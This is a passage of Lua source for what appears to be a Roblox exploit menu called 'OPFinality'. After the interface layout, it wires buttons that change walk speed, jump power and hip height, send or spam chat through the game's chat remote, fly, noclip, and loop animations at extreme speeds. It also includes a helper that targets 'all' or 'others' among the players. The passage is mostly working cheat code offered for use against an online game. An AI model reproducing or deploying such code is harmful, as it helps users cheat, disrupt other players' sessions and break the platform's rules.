UDim2.new(0.795000017, 0, -0.351000011, 0) T_OtherImage.Size = UDim2.new(0, 30, 0, 30) T_OtherImage.Image = "http://www.roblox.com/asset/?id=1281476978" T_Extra.Name = "T_Extra" T_Extra.Parent = MenuFrame T_Extra.BackgroundColor3 = Color3.new(0.584314, 0.647059, 0.65098) T_Extra.BorderSizePixel = 0 T_Extra.Position = UDim2.new(0, 0, 0.720708489, 0) T_Extra.Size = UDim2.new(1.00073266, 0, 0.0923985243, 0) T_Extra.Font = Enum.Font.SourceSans T_Extra.FontSize = Enum.FontSize.Size18 T_Extra.Text = "Extra" T_Extra.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) T_Extra.TextSize = 16 T_Extra.TextXAlignment = Enum.TextXAlignment.Left T_ExtraImage.Name = "T_ExtraImage" T_ExtraImage.Parent = T_Extra T_ExtraImage.BackgroundColor3 = Color3.new(1, 1, 1) T_ExtraImage.BackgroundTransparency = 1 T_ExtraImage.Position = UDim2.new(0.79469943, 0, -0.400639981, 0) T_ExtraImage.Size = UDim2.new(0.176599875, 0, 1.20192003, 0) T_ExtraImage.Image = "http://www.roblox.com/asset/?id=1281477720" DeleteGUI.Name = "DeleteGUI" DeleteGUI.Parent = MenuFrame DeleteGUI.BackgroundColor3 = Color3.new(0.752941, 0.223529, 0.168627) DeleteGUI.BorderSizePixel = 0 DeleteGUI.Position = UDim2.new(0, 0, 0.887025833, 0) DeleteGUI.Size = UDim2.new(1.00073266, 0, 0.0923985243, 0) DeleteGUI.Font = Enum.Font.SourceSans DeleteGUI.FontSize = Enum.FontSize.Size18 DeleteGUI.Text = "Delete GUI" DeleteGUI.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) DeleteGUI.TextSize = 16 DeleteGUI.TextXAlignment = Enum.TextXAlignment.Left DELETEIMAGE.Name = "DELETEIMAGE" DELETEIMAGE.Parent = DeleteGUI DELETEIMAGE.BackgroundColor3 = Color3.new(1, 1, 1) DELETEIMAGE.BackgroundTransparency = 1 DELETEIMAGE.Position = UDim2.new(0.853566051, 0, 0, 0) DELETEIMAGE.Size = UDim2.new(0.14716655, 0, 1.00160003, 0) DELETEIMAGE.Image = "http://www.roblox.com/asset/?id=1281475635" Darkness.Name = "Darkness" Darkness.Parent = MainFrame Darkness.BackgroundColor3 = Color3.new(0.180392, 0.192157, 0.176471) Darkness.BackgroundTransparency = 0.8 Darkness.BorderSizePixel = 0 Darkness.Position = UDim2.new(0.38499999, 0, 0.075000003, 0) Darkness.Size = UDim2.new(0, 272, 0, 271) Darkness.Visible = false Darkness.ZIndex = 7 Darkness.Font = Enum.Font.SourceSans Darkness.FontSize = Enum.FontSize.Size14 Darkness.Text = "" Darkness.TextSize = 14 ----------------------------------------------------------------- ----------------------------------------------------------------- NameOfPlayer.Text = game:GetService("Players").LocalPlayer.Name if game:GetService("Workspace").FilteringEnabled == true then Image_FE_ENABLED.Visible = true Image_FE_DISABLED.Visible = false Text_FE_ENABLED.Visible = true Text_FE_DISABLED.Visible = false else Image_FE_ENABLED.Visible = false Image_FE_DISABLED.Visible = true Text_FE_ENABLED.Visible = false Text_FE_DISABLED.Visible = true end function GetPlayer(String) -- Credit to Timeless/xFunnieuss local Found = {} local strl = String:lower() if strl == "all" then for i,v in pairs(game:GetService("Players"):GetPlayers()) do table.insert(Found,v) end elseif strl == "others" then for i,v in pairs(game:GetService("Players"):GetPlayers()) do if v.Name ~= game:GetService("Players").LocalPlayer.Name then table.insert(Found,v) end end else for i,v in pairs(game:GetService("Players"):GetPlayers()) do if v.Name:lower():sub(1, #String) == String:lower() then table.insert(Found,v) end end end return Found end OpenMenu.MouseButton1Click:connect(function() MenuFrame:TweenPosition(UDim2.new(0, 0, 0.075, 0), "Out", "Sine", 0.7) MenuEnterFrame:TweenPosition(UDim2.new(0, 170, 0.075, 0), "Out", "Sine", 0.7) Pages:TweenPosition(UDim2.new(0, 170, 0.223, 0), "Out", "Sine", 0.7) wait(0.7) Darkness.Visible = true Darkness.BackgroundTransparency = 0.8 end) Darkness.MouseButton1Click:connect(function() MenuFrame:TweenPosition(UDim2.new(-0.385, 0, 0.075, 0), "Out", "Sine", 0.7) MenuEnterFrame:TweenPosition(UDim2.new(0, 0, 0.074, 0), "Out", "Sine", 0.7) Pages:TweenPosition(UDim2.new(0, 0, 0.223, 0), "Out", "Sine", 0.7) Darkness.Visible = false end) closedgui = true CloseGUI.MouseButton1Click:connect(function() wait(0.3) if closedgui then Pages.Position = UDim2.new(0, 0, 0.223, 0) OpenMenu.Position = UDim2.new(0, 0, 0, 0) MenuFrame.Position = UDim2.new(-0.38499999, 0, 0.075000003, 0) MenuEnterFrame.Position = UDim2.new(0, 0, 0.0741975307, 0) Darkness.Visible = false Pages:TweenPosition(UDim2.new(0, 0, -0.786, 0), "Out", "Sine", 1.5) OpenMenu:TweenPosition(UDim2.new(-0.102, 0, 0, 0), "Out", "Sine", 1.5) wait(1.6) MenuFrame.Position = UDim2.new(-0.38499999, 0, 0.075000003, 0) Darkness.Visible = false MenuEnterFrame.Position = UDim2.new(0, 0, 0.0741975307, 0) closedgui = false else Pages:TweenPosition(UDim2.new(0, 0, 0.223, 0), "Out", "Sine", 1.5) wait(1.5) OpenMenu:TweenPosition(UDim2.new(0, 0, 0, 0), "Out", "Sine", 0.5) wait(0.6) closedgui = true end end) DeleteGUI.MouseButton1Click:connect(function() game:GetService("CoreGui").OPFinality:Destroy() end) T_Character.MouseButton1Click:connect(function() MenuFrame:TweenPosition(UDim2.new(-0.385, 0, 0.075, 0), "Out", "Sine", 0.5) MenuEnterFrame:TweenPosition(UDim2.new(0, 0, 0.074, 0), "Out", "Sine", 0.5) Pages:TweenPosition(UDim2.new(0, 0, 0.223, 0), "Out", "Sine", 0.5) Darkness.Visible = false wait(0.5) Character_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Extra_1:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Extra_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Games:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Information:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Others_1:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Others_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Others_3:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) wait(0.5) Character_1:TweenPosition(UDim2.new(0, 0, 0, 0), "Out", "Sine", 0.5) end) T_Extra.MouseButton1Click:connect(function() MenuFrame:TweenPosition(UDim2.new(-0.385, 0, 0.075, 0), "Out", "Sine", 0.5) MenuEnterFrame:TweenPosition(UDim2.new(0, 0, 0.074, 0), "Out", "Sine", 0.5) Pages:TweenPosition(UDim2.new(0, 0, 0.223, 0), "Out", "Sine", 0.5) Darkness.Visible = false wait(0.5) Character_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Character_1:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Extra_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Games:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Information:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Others_1:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Others_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Others_3:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) wait(0.5) Extra_1:TweenPosition(UDim2.new(0, 0, 0, 0), "Out", "Sine", 0.5) end) T_Games.MouseButton1Click:connect(function() MenuFrame:TweenPosition(UDim2.new(-0.385, 0, 0.075, 0), "Out", "Sine", 0.5) MenuEnterFrame:TweenPosition(UDim2.new(0, 0, 0.074, 0), "Out", "Sine", 0.5) Pages:TweenPosition(UDim2.new(0, 0, 0.223, 0), "Out", "Sine", 0.5) Darkness.Visible = false wait(0.5) Character_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Character_1:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Extra_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Extra_1:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Information:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Others_1:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Others_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Others_3:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) wait(0.5) Games:TweenPosition(UDim2.new(0, 0, 0, 0), "Out", "Sine", 0.5) end) T_Information.MouseButton1Click:connect(function() MenuFrame:TweenPosition(UDim2.new(-0.385, 0, 0.075, 0), "Out", "Sine", 0.5) MenuEnterFrame:TweenPosition(UDim2.new(0, 0, 0.074, 0), "Out", "Sine", 0.5) Pages:TweenPosition(UDim2.new(0, 0, 0.223, 0), "Out", "Sine", 0.5) Darkness.Visible = false wait(0.5) Character_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Character_1:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Extra_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Games:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Extra_1:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Others_1:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Others_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Others_3:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) wait(0.5) Information:TweenPosition(UDim2.new(0, 0, 0, 0), "Out", "Sine", 0.5) end) T_Others.MouseButton1Click:connect(function() MenuFrame:TweenPosition(UDim2.new(-0.385, 0, 0.075, 0), "Out", "Sine", 0.5) MenuEnterFrame:TweenPosition(UDim2.new(0, 0, 0.074, 0), "Out", "Sine", 0.5) Pages:TweenPosition(UDim2.new(0, 0, 0.223, 0), "Out", "Sine", 0.5) Darkness.Visible = false wait(0.5) Character_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Character_1:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Extra_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Games:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Information:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Extra_1:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Others_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Others_3:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) wait(0.5) Others_1:TweenPosition(UDim2.new(0, 0, 0, 0), "Out", "Sine", 0.5) end) Character_toPAGE2.MouseButton1Click:connect(function() Character_1:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) wait(0.5) Character_2:TweenPosition(UDim2.new(0, 0, 0, 0), "Out", "Sine", 0.5) end) Character_backPAGE1.MouseButton1Click:connect(function() Character_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) wait(0.5) Character_1:TweenPosition(UDim2.new(0, 0, 0, 0), "Out", "Sine", 0.5) end) Extra_toPAGE2.MouseButton1Click:connect(function() Extra_1:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) wait(0.5) Extra_2:TweenPosition(UDim2.new(0, 0, 0, 0), "Out", "Sine", 0.5) end) Extra_backPAGE1.MouseButton1Click:connect(function() Extra_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) wait(0.5) Extra_1:TweenPosition(UDim2.new(0, 0, 0, 0), "Out", "Sine", 0.5) end) Others_toPAGE2.MouseButton1Click:connect(function() Others_1:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) wait(0.5) Others_2:TweenPosition(UDim2.new(0, 0, 0, 0), "Out", "Sine", 0.5) end) Others_toPAGE3.MouseButton1Click:connect(function() Others_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) wait(0.5) Others_3:TweenPosition(UDim2.new(0, 0, 0, 0), "Out", "Sine", 0.5) end) Others_backPAGE1.MouseButton1Click:connect(function() Others_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) wait(0.5) Others_1:TweenPosition(UDim2.new(0, 0, 0, 0), "Out", "Sine", 0.5) end) Others_backPAGE2.MouseButton1Click:connect(function() Others_3:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) wait(0.5) Others_2:TweenPosition(UDim2.new(0, 0, 0, 0), "Out", "Sine", 0.5) end) ------------------------------------------------------------------------------- ------------------------------------------------------------------------------- HipHeight.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.Humanoid.HipHeight = TXTBOX_Stats.Text end) Speed.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.Humanoid.WalkSpeed = TXTBOX_Stats.Text end) JumpHeight.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.Humanoid.JumpPower = TXTBOX_Stats.Text end) Chat.MouseButton1Click:connect(function() game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(TXTBOX_Chat.Text, "All") end) SpammingChar = false Spam_2.MouseButton1Click:connect(function() SpammingChar = not SpammingChar end) local flying = false Fly.MouseButton1Click:connect(function() flying = not flying repeat wait() until game:GetService("Players").LocalPlayer and game:GetService("Players").LocalPlayer.Character and game:GetService("Players").LocalPlayer.Character:findFirstChild("Torso") and game:GetService("Players").LocalPlayer.Character:findFirstChild("Humanoid") local mouse = game:GetService("Players").LocalPlayer:GetMouse() repeat wait() until mouse local plr = game:GetService("Players").LocalPlayer local torso = plr.Character.Torso local deb = true local ctrl = {f = 0, b = 0, l = 0, r = 0} local lastctrl = {f = 0, b = 0, l = 0, r = 0} local maxspeed = 80 local speed = 0 if flying then Fly.BackgroundColor3 = Color3.new(0.201961, 0.837255, 0.711765) else Fly.BackgroundColor3 = Color3.new(0.101961, 0.737255, 0.611765) end function FlyFunction() local bg = Instance.new("BodyGyro", torso) bg.P = 9e4 bg.maxTorque = Vector3.new(9e9, 9e9, 9e9) bg.cframe = torso.CFrame local bv = Instance.new("BodyVelocity", torso) bv.velocity = Vector3.new(0,0.1,0) bv.maxForce = Vector3.new(9e9, 9e9, 9e9) repeat wait() plr.Character.Humanoid.PlatformStand = true if ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0 then speed = speed+.5+(speed/maxspeed) if speed > maxspeed then speed = maxspeed end elseif not (ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0) and speed ~= 0 then speed = speed-1 if speed < 0 then speed = 0 end end if (ctrl.l + ctrl.r) ~= 0 or (ctrl.f + ctrl.b) ~= 0 then bv.velocity = ((game:GetService("Workspace").CurrentCamera.CoordinateFrame.lookVector * (ctrl.f+ctrl.b)) + ((game:GetService("Workspace").CurrentCamera.CoordinateFrame * CFrame.new(ctrl.l+ctrl.r,(ctrl.f+ctrl.b)*.2,0).p) - game:GetService("Workspace").CurrentCamera.CoordinateFrame.p))*speed lastctrl = {f = ctrl.f, b = ctrl.b, l = ctrl.l, r = ctrl.r} elseif (ctrl.l + ctrl.r) == 0 and (ctrl.f + ctrl.b) == 0 and speed ~= 0 then bv.velocity = ((game:GetService("Workspace").CurrentCamera.CoordinateFrame.lookVector * (lastctrl.f+lastctrl.b)) + ((game:GetService("Workspace").CurrentCamera.CoordinateFrame * CFrame.new(lastctrl.l+lastctrl.r,(lastctrl.f+lastctrl.b)*.2,0).p) - game:GetService("Workspace").CurrentCamera.CoordinateFrame.p))*speed else bv.velocity = Vector3.new(0,0.1,0) end bg.cframe = game:GetService("Workspace").CurrentCamera.CoordinateFrame * CFrame.Angles(-math.rad((ctrl.f+ctrl.b)*50*speed/maxspeed),0,0) until not flying ctrl = {f = 0, b = 0, l = 0, r = 0} lastctrl = {f = 0, b = 0, l = 0, r = 0} speed = 0 bg:Destroy() bv:Destroy() plr.Character.Humanoid.PlatformStand = false end mouse.KeyDown:connect(function(key) if key:lower() == "w" then ctrl.f = 1 elseif key:lower() == "s" then ctrl.b = -1 elseif key:lower() == "a" then ctrl.l = -1 elseif key:lower() == "d" then ctrl.r = 1 end end) mouse.KeyUp:connect(function(key) if key:lower() == "w" then ctrl.f = 0 elseif key:lower() == "s" then ctrl.b = 0 elseif key:lower() == "a" then ctrl.l = 0 elseif key:lower() == "d" then ctrl.r = 0 end end) FlyFunction() end) clip = true Noclip.MouseButton1Click:connect(function() clip = not clip game:GetService('RunService').Stepped:connect(function() if not clip then Noclip.BackgroundColor3 = Color3.new(0.201961, 0.837255, 0.711765) game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false else Noclip.BackgroundColor3 = Color3.new(0.101961, 0.737255, 0.611765) end end) end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://33169583" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local armsareoff = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) armsareoff = false armsoff.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end) armsoff.MouseButton1Click:connect(function() armsareoff = not armsareoff if armsareoff then armsoff.BackgroundColor3 = Color3.new(0.851961, 0.694118, 0.333333) while wait() do if track.IsPlaying == false then if armsareoff then track:Play(.1, 1, 1e6) end end end else track:Stop() armsoff.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://121572214" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) headfloatACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) headfloatACTIVE = false headfloat.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end) headfloat.MouseButton1Click:connect(function() headfloatACTIVE = not headfloatACTIVE if headfloatACTIVE then headfloat.BackgroundColor3 = Color3.new(0.851961, 0.694118, 0.333333) while wait() do if track.IsPlaying == false then if headfloatACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() headfloat.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://35154961" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local headthrowACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) headthrowACTIVE = false headthrow.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end) headthrow.MouseButton1Click:connect(function() headthrowACTIVE = not headthrowACTIVE if headthrowACTIVE then headthrow.BackgroundColor3 = Color3.new(0.851961, 0.694118, 0.333333) while wait() do if track.IsPlaying == false then if headthrowACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() headthrow.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://35154961" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local loopheadACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) loopheadACTIVE = false loophead.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end) loophead.MouseButton1Click:connect(function() loopheadACTIVE = not loopheadACTIVE if loopheadACTIVE then loophead.BackgroundColor3 = Color3.new(0.851961, 0.694118, 0.333333) while wait() do if track.IsPlaying == false then if loopheadACTIVE then track:Play(.1, 1, 1e6) end end end else track:Stop() loophead.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://313762630" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local levitateACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) levitateACTIVE = false levitate.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end) levitate.MouseButton1Click:connect(function() levitateACTIVE = not levitateACTIVE if levitateACTIVE then levitate.BackgroundColor3 = Color3.new(0.851961, 0.694118, 0.333333) while wait() do if track.IsPlaying == false then if levitateACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() levitate.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://282574440" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local crawlACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) crawlACTIVE = false crawl.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end) crawl.MouseButton1Click:connect(function() crawlACTIVE = not crawlACTIVE if crawlACTIVE then crawl.BackgroundColor3 = Color3.new(0.851961, 0.694118, 0.333333) while wait() do if track.IsPlaying == false then if crawlACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() crawl.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://184574340" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local jumplandACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) jumplandACTIVE = false jumpland.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end) jumpland.MouseButton1Click:connect(function() jumplandACTIVE = not jumplandACTIVE if jumplandACTIVE then jumpland.BackgroundColor3 = Color3.new(0.851961, 0.694118, 0.333333) while wait() do if track.IsPlaying == false then if jumplandACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() jumpland.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://126753849" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local punchesACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) punchesACTIVE = false punches.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end) punches.MouseButton1Click:connect(function() punchesACTIVE = not punchesACTIVE if punchesACTIVE then punches.BackgroundColor3 = Color3.new(0.851961, 0.694118, 0.333333) while wait() do if track.IsPlaying == false then if punchesACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() punches.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://204062532" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local swingACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) swingACTIVE = false swing.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end) swing.MouseButton1Click:connect(function() swingACTIVE = not swingACTIVE if swingACTIVE then swing.BackgroundColor3 = Color3.new(0.851961, 0.694118, 0.333333) while wait() do if track.IsPlaying == false then if swingACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() swing.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://204295235" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local swordstrikeACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) swordstrikeACTIVE = false swordstrike.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end) swordstrike.MouseButton1Click:connect(function() swordstrikeACTIVE = not swordstrikeACTIVE if swordstrikeACTIVE then swordstrike.BackgroundColor3 = Color3.new(0.851961, 0.694118, 0.333333) while wait() do if track.IsPlaying == false then if swordstrikeACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() swordstrike.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://45834924" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local happyACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) happyACTIVE = false happy.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end) happy.MouseButton1Click:connect(function() happyACTIVE = not happyACTIVE if happyACTIVE then happy.BackgroundColor3 = Color3.new(0.851961, 0.694118, 0.333333) while wait() do if track.IsPlaying == false then if happyACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() happy.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://33796059" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local insaneACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) insaneACTIVE = false insane.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end) insane.MouseButton1Click:connect(function() insaneACTIVE = not insaneACTIVE if insaneACTIVE then insane.BackgroundColor3 = Color3.new(0.851961, 0.694118, 0.333333) while wait() do if track.IsPlaying == false then if insaneACTIVE then track:Play(.1, 1, 1e6) end end end else track:Stop() insane.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://429703734" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local movingdanceACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) movingdanceACTIVE = false movingdance.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end) movingdance.MouseButton1Click:connect(function() movingdanceACTIVE = not movingdanceACTIVE if movingdanceACTIVE then movingdance.BackgroundColor3 = Color3.new(0.851961, 0.694118, 0.333333) while wait() do if track.IsPlaying == false then if movingdanceACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() movingdance.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://35654637" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local normalACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) normalACTIVE = false normal.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end) normal.MouseButton1Click:connect(function() normalACTIVE = not normalACTIVE if normalACTIVE then normal.BackgroundColor3 = Color3.new(0.851961, 0.694118, 0.333333) while wait() do if track.IsPlaying == false then if normalACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() normal.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://186934910" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local spindanceACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) spindanceACTIVE = false spindance.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end) spindance.MouseButton1Click:connect(function() spindanceACTIVE = not spindanceACTIVE if spindanceACTIVE then spindance.BackgroundColor3 = Color3.new(0.851961, 0.694118, 0.333333) while wait() do if track.IsPlaying == false then if spindanceACTIVE then track:Play(.1, 1, 1) end end end else track:Stop() spindance.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://215384594" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local CloneIllusionACTIVE = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) CloneIllusionACTIVE = false CloneIllusion.BackgroundColor3 = Color3.new(0.952941, 0.611765, 0.0705882) end) CloneIllusion.MouseButton1Click:connect(function() CloneIllusionACTIVE = not CloneIllusionACTIVE if CloneIllusionACTIVE then CloneIllusion.BackgroundColor3 = Color3.new(0.992941, 0.811765, 0.2705882) while wait() do if track.IsPlaying == false then if CloneIllusionACTIVE then track:Play(.1, 1, 1e6) end end end else track:Stop() CloneIllusion.BackgroundColor3 = Color3.new(0.952941, 0.611765, 0.0705882) end end) spinning = false 